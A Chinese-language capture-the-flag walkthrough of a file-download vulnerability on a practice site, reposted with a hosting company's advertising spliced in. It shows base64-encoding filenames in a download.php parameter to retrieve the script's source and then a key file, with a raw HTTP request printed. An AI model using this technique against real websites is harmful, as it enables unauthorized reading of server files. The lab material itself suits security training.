文件下载漏洞练习(一)-创新互联

(1)打开网页
文件下载漏洞练习(一)
(2)同样的先抓下包
文件下载漏洞练习(一)

10年积累的成都做网站、成都网站建设经验,可以快速应对客户对网站的新想法和需求。提供各种问题对应的解决方案。让选择我们的客户得到更好、更有力的网络服务。我虽然不认识你,你也不认识我。但先制作网站后付款的网站建设流程,更有义乌免费网站建设让你可以放心的选择与我们合作。

我们注意到:
url=Y2hvdWJhZ3VhaS5tcDM 还有/download.php

先解码看看是什么
文件下载漏洞练习(一)
是个文件名
文件下载漏洞练习(一)
(3)我们试着将其替换成、download.php
文件下载漏洞练习(一)

GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1
Host: e2ad76b4d4b6d6ed.yunyansec.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/
Accept-Language: zh-CN,zh;q=0.9
Connection: close

(4)文件下载成功,打开后发现还可以有hereiskey.php下载

文件下载漏洞练习(一)

同样先编码
文件下载漏洞练习(一)
得到key
文件下载漏洞练习(一)

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


分享题目:文件下载漏洞练习(一)-创新互联
浏览地址:http://myzitong.com/article/dgccid.html